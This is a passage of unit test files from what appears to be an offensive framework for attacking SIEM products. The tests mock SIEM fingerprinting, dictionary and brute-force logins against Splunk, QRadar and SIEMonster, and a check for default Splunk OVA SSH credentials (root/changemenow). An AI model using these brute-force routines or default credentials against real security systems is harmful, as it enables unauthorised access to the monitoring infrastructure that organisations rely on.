"\n\x1b[32m\x1b[22m[*] ===================================" \ 74 | "=========================================================" \ 75 | "================== [*]\x1b[0m\n" 76 | 77 | with patch(self.stdout, new=StringIO()) as qradar_out: 78 | qradar_apikeybrute(self.ip, self.port) 79 | self.assertEqual(qradar_out.getvalue(), result) 80 | 81 | 82 | if __name__ == "__main__": 83 | unittest.main() 84 | 85 | # %%%%%%%%%% The End %%%%%%%%%%# 86 | 87 | 88 | -------------------------------------------------------------------------------- /test/test_scanning.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | import scanning 6 | import requests_mock 7 | 8 | from unittest.mock import patch 9 | 10 | 11 | class TestSIEMFramework(unittest.TestCase): 12 | maxDiff = None 13 | 14 | def setUp(self): 15 | self.ip = '192.168.1.8' 16 | self.port = '443' 17 | self.inputs = 'builtins.input' 18 | self.url_base ='https://192.168.1.8:443' 19 | 20 | def test_input_ip(self): 21 | result_true = '10.1.16.200' 22 | result_false = '' 23 | with patch(self.inputs, return_value='10.1.16.200'): 24 | ip_true = scanning.input_ip() 25 | self.assertEqual(ip_true, result_true) 26 | 27 | with patch(self.inputs, return_value='1000.1.10.300'): 28 | ip_false = scanning.input_ip() 29 | self.assertEqual(ip_false, result_false) 30 | 31 | def test_input_port(self): 32 | result_default = 0 33 | result_true = '8888' 34 | result_false = '' 35 | with patch(self.inputs, return_value=''): 36 | port_default = scanning.input_port() 37 | self.assertEqual(port_default, result_default) 38 | 39 | with patch(self.inputs, return_value='8888'): 40 | port_true = scanning.input_port() 41 | self.assertEqual(port_true, result_true) 42 | 43 | with patch(self.inputs, return_value='1000110300'): 44 | port_false = scanning.input_ip() 45 | self.assertEqual(port_false, result_false) 46 | 47 | def test_input_net(self): 48 | result = '192.168.1.0/24' 49 | with patch(self.inputs, return_value='192.168.1.0/24'): 50 | net = scanning.input_net() 51 | self.assertEqual(net, result) 52 | 53 | @requests_mock.mock() 54 | def test_splunk_detect(self, response): 55 | self.port = '8089' 56 | response.get('https://192.168.1.8:8089', text='splunkd') 57 | result = 'Splunk' 58 | self.assertEqual(scanning.splunk_detect(self.ip, self.port), result) 59 | 60 | @requests_mock.mock() 61 | def test_graylog_detect(self, response): 62 | self.port = '9000' 63 | response.get('http://192.168.1.8:9000', text='Graylog Web Interface') 64 | result = 'Graylog' 65 | self.assertEqual(scanning.graylog_detect(self.ip, self.port), result) 66 | 67 | @requests_mock.mock() 68 | def test_ossim_detect(self, response): 69 | response.get(self.url_base + '/ossim/session/login.php', 70 | text='AlienVault OSSIM') 71 | result = 'OSSIM' 72 | self.assertEqual(scanning.ossim_detect(self.ip, self.port), result) 73 | 74 | @requests_mock.mock() 75 | def test_qradar_detect(self, response): 76 | response.get(self.url_base + '/console/', headers={'Server': 'QRadar'}) 77 | result = 'QRadar' 78 | self.assertEqual(scanning.qradar_detect(self.ip, self.port), result) 79 | 80 | @requests_mock.mock() 81 | def test_mcafee_detect(self, response): 82 | response.get(self.url_base, text='McAfee SIEM') 83 | result = 'McAfee' 84 | self.assertEqual(scanning.mcafee_detect(self.ip, self.port), result) 85 | 86 | @requests_mock.mock() 87 | def test_elasticsiem_detect(self, response): 88 | self.port = '5601' 89 | response.get('http://192.168.1.8:5601' + '/app/siem', 90 | headers={'kbn-name': 'elasticsiem'}, text='Elastic') 91 | result = 'ElasticSIEM' 92 | self.assertEqual(scanning.elasticsiem_detect(self.ip, self.port), 93 | result) 94 | 95 | def test_scan_host(self): 96 | result = 'None' 97 | self.assertEqual(scanning.scan_host(self.ip, self.port), result) 98 | 99 | 100 | if __name__ == "__main__": 101 | unittest.main() 102 | 103 | # %%%%%%%%%% The End %%%%%%%%%%# 104 | 105 | 106 | -------------------------------------------------------------------------------- /test/test_siemonster.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | import requests_mock 6 | 7 | from io import StringIO 8 | from unittest.mock import patch 9 | 10 | from siemonster.bfssh_smonster import smonster_ssh_bf 11 | 12 | 13 | class TestSiemsframework(unittest.TestCase): 14 | 15 | def setUp(self): 16 | self.ip = '192.168.0.30' 17 | self.port = '443' 18 | self.url_base = 'https://siemonster.internal.co' 19 | self.stdout = 'sys.stdout' 20 | self.headers = { 21 | 'Accept': 'application/json,text/plain,*/*', 22 | 'DNT': '1', 23 | 'Host': self.ip, 24 | 'Origin': self.url_base, 25 | 'Referer': self.url_base, 26 | 'Content-Type': 'application/json;charset=utf-8', 27 | 'Connection': 'keep - alive', 28 | 'X-Xsrf-Token': 'null' 29 | } 30 | 31 | """@requests_mock.mock() 32 | def test_mcafee_brute(self, response): 33 | url1 = self.url_base + '/ess' 34 | url2 = self.url_base + '/rs/esm/v2/login' 35 | 36 | response.post(url1, status_code=200) 37 | response.post(url2, status_code=201) 38 | 39 | result = "\n\n\x1b[32m\x1b[1m[*] =================================" \ 40 | "========================================================" \ 41 | "===================== [*]" \ 42 | "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \ 43 | "\n\x1b[32m\x1b[1m[*] ====================================" \ 44 | "=========================================================" \ 45 | "================= [*]"\ 46 | "\x1b[0m\n\x1b[32m\x1b[22m[*] ============================" \ 47 | "=========================================================" \ 48 | "========================= [*]"\ 49 | "\n[!] Username: \x1b[31m\x1b[1mNGCP" \ 50 | "\n[!] Password: \x1b[31m\x1b[1mhs+&8:fiY91" \ 51 | "\n\x1b[32m\x1b[22m[*] ===================================" \ 52 | "=========================================================" \ 53 | "================== [*]\x1b[0m\n" 54 | 55 | with patch(self.stdout, new=StringIO()) as mcafee_out: 56 | mcafee_brute(self.ip, self.port) 57 | self.assertEqual(mcafee_out.getvalue(), result)""" 58 | 59 | def test_smonster_ssh_bf(self): 60 | nm = { 61 | 'nmap': { 62 | 'command_line': 'nmap -oX - -sT -T4 -p 22 192.168.1.8', 63 | 'scaninfo': { 64 | 'tcp': { 65 | 'method': 'connect', 'services': '22'}}, 66 | 'scanstats': { 67 | 'timestr': 'Sat May 16 17:00:54 2020', 68 | 'elapsed': '0.03', 'uphosts': '1', 'downhosts': '0','totalhosts': '1'} 69 | }, 70 | 'scan': { 71 | '192.168.1.8': { 72 | 'hostnames': [{'name': '', 'type': ''}], 73 | 'addresses': { 74 | 'ipv4': '192.168.1.8'}, 75 | 'vendor': {}, 76 | 'status': { 77 | 'state': 'up', 78 | 'reason': 'syn-ack'}, 79 | 'tcp': { 80 | 22: { 81 | 'state': 'open', 82 | 'reason': 'syn-ack', 83 | 'name': 'ssh', 84 | 'product': '', 85 | 'version': '', 86 | 'extrainfo': '', 87 | 'conf': '3', 88 | 'cpe': ''}}}}} 89 | result = "\n\n\x1b[32m\x1b[1m[*] =================================" \ 90 | "========================================================" \ 91 | "===================== [*]" \ 92 | "\n\x1b[31m\x1b[1m[!] Dictionary Attack Not Successful" \ 93 | "\n\x1b[32m\x1b[1m[*] ====================================" \ 94 | "========================================================" \ 95 | "================== [*]\x1b[0m\n" 96 | 97 | with patch('sys.stdout', new=StringIO()) as smonster_out: 98 | with patch('nmap.PortScanner.scan') as mock_nmap: 99 | with patch('paramiko.SSHClient.connect', autospec=True) as\ 100 | mock_ssh: 101 | mock_nmap.return_value = nm 102 | mock_nmap._scan_result = nm 103 | mock_ssh.return_value = True 104 | smonster_ssh_bf(self.ip) 105 | self.assertEqual(smonster_out.getvalue(), result) 106 | 107 | 108 | if __name__ == "__main__": 109 | unittest.main() 110 | 111 | # %%%%%%%%%% The End %%%%%%%%%%# 112 | 113 | 114 | -------------------------------------------------------------------------------- /test/test_siemsframework.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | 6 | import siemsframework 7 | from unittest.mock import call 8 | from unittest.mock import patch 9 | 10 | 11 | class TestSiemsframework (unittest.TestCase): 12 | inputs = 'siemsframework.input' 13 | 14 | def setUp(self): 15 | self.inputs = 'siemsframework.input' 16 | self.options = ['Splunk', 'Graylog', 'OSSIM', 'QRadar', 'McAfee'] 17 | 18 | def test_menus_options(self): 19 | for option in self.options: 20 | with patch(self.inputs, return_value=option): 21 | value_expect = option 22 | return_value = siemsframework.menus(menu=option) 23 | 24 | self.assertEqual(value_expect, return_value) 25 | 26 | @unittest.mock.patch(inputs, return_value='1') 27 | def test_menus_option_1(self, mock): 28 | value_expect = '1' 29 | return_value = siemsframework.menus(menu=1) 30 | 31 | self.assertEqual(value_expect, return_value) 32 | self.assertEqual(mock.call_count, 1) 33 | 34 | @unittest.mock.patch(inputs, return_value='2') 35 | def test_menus_option_2(self, mock): 36 | value_expect = '2' 37 | return_value = siemsframework.menus(menu=2) 38 | 39 | self.assertEqual(value_expect, return_value) 40 | self.assertEqual(mock.call_count, 1) 41 | 42 | 43 | if __name__ == "__main__": 44 | unittest.main() -------------------------------------------------------------------------------- /test/test_splunk.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | import requests_mock 6 | 7 | from io import StringIO 8 | from unittest.mock import patch 9 | 10 | from splunk.testovacredentials import ova_credentials 11 | from splunk.bruteforcesplunk import bruteforce_splunk 12 | 13 | 14 | class TestSiemsframework(unittest.TestCase): 15 | 16 | def setUp(self): 17 | self.ip = '192.168.1.8' 18 | self.port = '8089' 19 | self.url_base = 'https://192.168.1.8:8089' 20 | self.stdout = 'sys.stdout' 21 | 22 | def test_bruteforce(self): 23 | result = "\n\n\x1b[32m\x1b[1m[*] =================================" \ 24 | "========================================================" \ 25 | "===================== [*]" \ 26 | "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \ 27 | "\n\x1b[32m\x1b[1m[*] ====================================" \ 28 | "=========================================================" \ 29 | "================= [*]" \ 30 | "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] =========================" \ 31 | "========================================================" \ 32 | "============================= [*]" \ 33 | "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1madmin" \ 34 | "\n\x1b[33m[!] Password: \x1b[31m\x1b[1mno password" \ 35 | "\n\x1b[32m\x1b[1m[*] ===================================" \ 36 | "=========================================================" \ 37 | "================== [*]\x1b[0m\n" 38 | 39 | with patch(self.stdout, new=StringIO()) as splunk_out: 40 | with patch('splunklib.client.connect') as mock_connect: 41 | mock_connect.return_value = True 42 | bruteforce_splunk(self.ip, self.port) 43 | self.assertEqual(splunk_out.getvalue(), result) 44 | 45 | @patch('paramiko.SSHClient.connect', return_value=True) 46 | def test_ssh_ova_credential(self, mock_ssh): 47 | user = 'root' 48 | password = 'changemenow' 49 | result = "\x1b[32m\x1b[22m[*] =================================" \ 50 | "========================================================" \ 51 | "===================== [*]" \ 52 | "\n\x1b[32m\x1b[22m[!] Splunk VMWare OVA SSH Default " \ 53 | "Credentials Found!" \ 54 | "\n\x1b[32m\x1b[22m[*] ====================================" \ 55 | "=========================================================" \ 56 | "================= [*]"\ 57 | "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] ============================" \ 58 | "=========================================================" \ 59 | "========================= [*]"\ 60 | "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1mroot" \ 61 | "\n\x1b[33m[!] Password: \x1b[31m\x1b[1mchangemenow" \ 62 | "\n\x1b[32m\x1b[1m[*] ===================================" \ 63 | "=========================================================" \ 64 | "================== [*]\x1b[0m\n" 65 | 66 | with patch('sys.stdout', new=StringIO()) as splunk_out: 67 | ova_credentials(self.ip, user, password) 68 | self.assertEqual(splunk_out.getvalue(), result) 69 | 70 | 71 | if __name__ == "__main__": 72 | unittest.main() 73 | 74 | # %%%%%%%%%% The End %%%%%%%%%%# 75 | 76 | 77 | --------------------------------------------------------------------------------